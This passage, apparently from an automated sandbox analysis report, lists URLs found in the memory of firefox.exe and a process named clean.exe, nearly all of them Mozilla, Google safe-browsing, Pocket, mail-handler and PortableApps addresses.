Source: firefox.exe, 00000011.00000003.2406459115.000002435EE11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2335110994.000002435C98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000011.00000003.2400573242.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2380446020.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2427444409.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2305816782.0000024363830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2374374159.0000024363830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000011.00000003.2335110994.000002435C97F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000011.00000003.2335110994.000002435C97F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000011.00000003.2335483499.000002435C92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000011.00000003.2491259190.000002435ED70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2421599733.000002435ED70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000011.00000003.2491259190.000002435ED70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2421599733.000002435ED70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000011.00000003.2410334334.000002435B67E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000011.00000003.2410334334.000002435B67E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000011.00000003.2410334334.000002435B67E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000017.00000002.3339469493.0000025EFE58F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2505446276.00000243577A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000011.00000003.2410334334.000002435B67E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000011.00000003.2410334334.000002435B67E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://portableapps.com/
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://portableapps.com/apps/utilities/7-zip_portable
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://portableapps.com/donate
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://portableapps.com/feeds/general
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://portableapps.com/support/portable_app#downloading
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://portableapps.com/support/portable_app#installing
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://portableapps.com/support/portable_app#upgrading
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://portableapps.com/support/portable_app#using
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000011.00000003.2397264757.0000024368141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2495210278.000002435E21D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com
Source: firefox.exe, 00000011.00000003.2446484016.000002435E236000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 00000011.00000003.2419798569.0000024365361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000011.00000003.2485970156.000002435E467000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2332689238.000002435E463000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000011.00000003.2319599605.000002435C180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000011.00000003.2259618778.0000024359200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000011.00000003.2406459115.000002435EE11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/rev/3aef835f6cb12e607154d56d68726767172571e4/toolkit/content/w
Source: firefox.exe, 00000011.00000003.2388692284.000002435C732000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000011.00000003.2471726860.00000243681B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000011.00000003.2335483499.000002435C92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000011.00000003.2332689238.000002435E463000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000011.00000003.2397264757.0000024368141000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000011.00000003.2318855591.000002435C18C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2https:
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000011.00000003.2332689238.000002435E463000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000011.00000003.2318855591.000002435C18C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000011.00000003.2421599733.000002435EDDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2449494702.000002435DB8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000011.00000003.2491259190.000002435EDDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2419798569.0000024365361000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C7212000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3339469493.0000025EFE513000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000017.00000002.3339469493.0000025EFE513000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/CN=The
Source: firefox.exe, 00000011.00000003.2347364435.0000024368369000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocsparseGridPositions/gridPositions
Source: firefox.exe, 00000017.00000002.3339469493.0000025EFE5F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userdiscoverystream.personalization.modelKeys
Source: places.sqlite-wal.17.dr String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
